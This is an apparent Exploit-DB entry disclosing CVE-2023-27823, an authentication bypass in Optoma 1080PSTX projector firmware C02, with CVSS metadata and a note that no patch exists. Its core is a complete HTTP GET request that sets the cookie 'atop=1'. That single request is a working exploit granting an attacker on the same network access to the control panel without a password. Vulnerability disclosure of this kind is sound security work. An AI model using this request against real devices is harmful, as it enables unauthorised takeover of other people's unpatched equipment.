Optoma 1080PSTX Firmware C02 - Authentication Bypass

vendor:

Optoma 1080PSTX

by:

Anthony Cole

9.8

CVSS

CRITICAL

Authentication Bypass

CWE

Product Name: Optoma 1080PSTX

Affected Version From: Optoma 1080PSTX Firmware C02

Affected Version To: Optoma 1080PSTX Firmware C02

Patch Exists: NO

Related CWE: CVE-2023-27823

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2023

Optoma 1080PSTX Firmware C02 – Authentication Bypass

By manually setting the "atop" cookie to the value of "1", an attacker on the same network can bypass the username and password requirement to access the application control panel of the Optoma 1080PSTX firmware C02.

Mitigation:

Unknown

Source

Exploit-DB raw data:

# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass
# Date: 2023/05/09
# Exploit Author: Anthony Cole
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Vendor Homepage: http://optoma.com
# Version: Optoma 1080PSTX Firmware C02
# Tested on: N/A
# CVE : CVE-2023-27823

Details
By default the web interface of the 1080PSTX requires a username and password to access the application control panel.  However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".

GET /index.asp HTTP/1.1
Host: projector
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: atop=1
Connection: close